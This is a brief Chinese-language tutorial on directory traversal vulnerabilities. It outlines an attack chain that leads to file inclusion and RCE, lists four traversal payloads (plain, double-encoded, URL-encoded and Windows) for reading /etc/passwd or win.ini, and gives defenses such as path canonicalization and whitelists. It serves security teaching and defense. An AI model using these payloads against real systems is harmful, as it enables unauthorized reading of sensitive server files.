目录穿越漏洞实战

目录穿越漏洞完整指南:../ 路径遍历、编码绕过、读取敏感文件、防御加固。

写在前面:合法学习边界

目录穿越测试只在授权测试环境进行。

一、目录穿越攻击链

目录穿越攻击链
1
① 发现参数 → ② 构造 ../ → ③ 读取敏感文件 → ④ 结合文件包含 → RCE

二、利用方式

1
2
3
4
../../etc/passwd
..%252f..%252fetc/passwd(双重编码)
..\..\..\windows\win.ini(Windows)
%2e%2e%2f%2e%2e%2fetc/passwd(URL编码)

三、防御加固

1
2
3
4
路径规范化:realpath/canonicalize
禁止 ../ 参数
文件白名单限制
WAF 规则拦截

四、小结

目录穿越的核心是用户可控路径参数被直接拼接。防御核心是路径规范化 + 白名单限制